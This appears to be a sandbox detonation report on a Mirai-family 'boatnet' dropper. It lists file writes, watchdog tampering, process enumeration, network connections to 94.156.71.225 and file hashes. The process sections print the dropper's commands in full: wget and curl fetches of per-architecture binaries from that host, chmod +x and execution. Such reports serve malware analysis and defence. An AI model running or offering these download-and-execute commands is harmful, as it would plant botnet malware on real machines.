| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x WTF boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-mipsbe-20240611-en
Max time kernel
60s
Max time network
64s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
59s
Max time network
64s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/496/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1265/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1606/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1597/status | /tmp/WTF | N/A |
| File opened for reading | /proc/174/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1596/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1042/status | /tmp/WTF | N/A |
| File opened for reading | /proc/426/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1555/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1184/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1566/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1055/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1305/status | /tmp/WTF | N/A |
| File opened for reading | /proc/550/status | /tmp/WTF | N/A |
| File opened for reading | /proc/568/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1526/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1666/status | /tmp/WTF | N/A |
| File opened for reading | /proc/31/status | /tmp/WTF | N/A |
| File opened for reading | /proc/137/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1305/status | /tmp/WTF | N/A |
| File opened for reading | /proc/21/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1614/status | /tmp/WTF | N/A |
| File opened for reading | /proc/13/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/status | /tmp/WTF | N/A |
| File opened for reading | /proc/467/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1653/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1599/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1526/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1585/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1623/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1083/status | /tmp/WTF | N/A |
| File opened for reading | /proc/465/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1604/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1660/status | /tmp/WTF | N/A |
| File opened for reading | /proc/659/status | /tmp/WTF | N/A |
